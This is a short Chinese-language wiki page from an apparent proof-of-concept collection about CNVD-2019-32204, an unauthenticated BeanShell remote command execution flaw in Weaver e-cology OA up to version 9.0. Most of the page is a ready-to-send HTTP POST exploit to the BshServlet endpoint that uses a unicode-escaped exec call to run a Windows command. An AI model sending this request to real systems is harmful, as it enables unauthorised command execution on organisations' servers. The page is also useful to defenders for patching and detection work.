menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right POChouse-main chevron_right [+] 协同办公OA系统 chevron_right Ecology-泛微OA chevron_right Bsh远程代码执行(CNVD-2019-32204)
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    漏洞概述

    泛泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行

    影响范围

    E-cology <= 9.0

    EXP

    POST /weaver/bsh.servlet.BshServlet HTTP/1.1
    Host: xxxxxxxx:8088
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Length: 98
    Content-Type: application/x-www-form-urlencoded
    
    bsh.script=ex\u0065c("cmd /c whoami");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
    

    POC

    大宝剑已同步此漏洞